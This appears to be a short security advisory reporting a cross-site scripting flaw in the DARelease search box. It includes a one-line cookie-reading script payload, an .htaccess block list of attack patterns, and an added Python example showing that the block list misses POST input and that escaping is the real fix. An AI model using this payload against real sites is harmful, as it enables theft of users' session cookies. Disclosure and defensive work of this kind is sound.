endLesS
Webmaster
< ------------------- header data start ------------------- >
#############################################################
# Application Name : DARelease
# Vulnerable Type : Cross Site Scripting
# Infection : Administrator and user cookies can be stolen.
# Bug Fix Advice : Malicious characters should be filtered.
# Author : qrusher- | Bug Researchers
# Example : http://www.darelease.com/search.php
Post Search Box
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code start -- >
Add the code below to your .htaccess file; your site will then return an error on any XSS
attack made against it.
RewriteEngine On
# Each condition is tested against the raw (still percent-encoded) query string
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# [F] answers 403 Forbidden; [L] stops further rule processing
RewriteRule ^(.*)$ index.php [F,L]
< -- bug code end of -- >
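Added example, not part of the original advisory: a Python check of what the four RewriteCond patterns above actually cover. They are matched against the URL query string only, so a term submitted through the POST search box reaches search.php without being inspected, and the advised filtering has to happen where the term is written into the page. The field name `q`, the helper `render_result_heading`, and the percent-encoded `%3C`/`%3E` alternatives are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# The four RewriteCond patterns from the advisory as (regex, flags).
# mod_rewrite tests them against the raw, still percent-encoded query string.
# Assumption: the second pattern carries the %3C / %3E alternatives.
CONDITIONS = [
    (r"base64_encode.*\(.*\)", 0),
    (r"(\<|%3C).*script.*(\>|%3E)", re.IGNORECASE),  # [NC]
    (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", 0),
    (r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})", 0),
]

def rules_block(request_uri: str) -> bool:
    """True when the rule set would answer 403 ([F]) for this request URI."""
    query = urlsplit(request_uri).query
    return any(re.search(pattern, query, flags) for pattern, flags in CONDITIONS)

def render_result_heading(term: str) -> str:
    """Hypothetical search-page fragment: encode the term for HTML text output."""
    return "<h2>Results for: " + html.escape(term, quote=True) + "</h2>"

# Constructed sample requests (method, URI, body); "q" is an assumed field name.
MARKER = "<script>alert(document.cookie)</script>"
SAMPLES = [
    ("GET", "/search.php?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E", ""),
    ("GET", "/search.php?q=firewall", ""),
    ("POST", "/search.php", "q=" + MARKER),
]

def coverage():
    """(method, blocked_by_rules) per sample; the POST body is never examined."""
    return [(method, rules_block(uri)) for method, uri, _body in SAMPLES]

if __name__ == "__main__":
    for method, blocked in coverage():
        print(method, "403 Forbidden" if blocked else "passed to search.php")
    # The encoded heading is inert markup whatever route the term arrived by.
    print(render_result_heading(MARKER))
```
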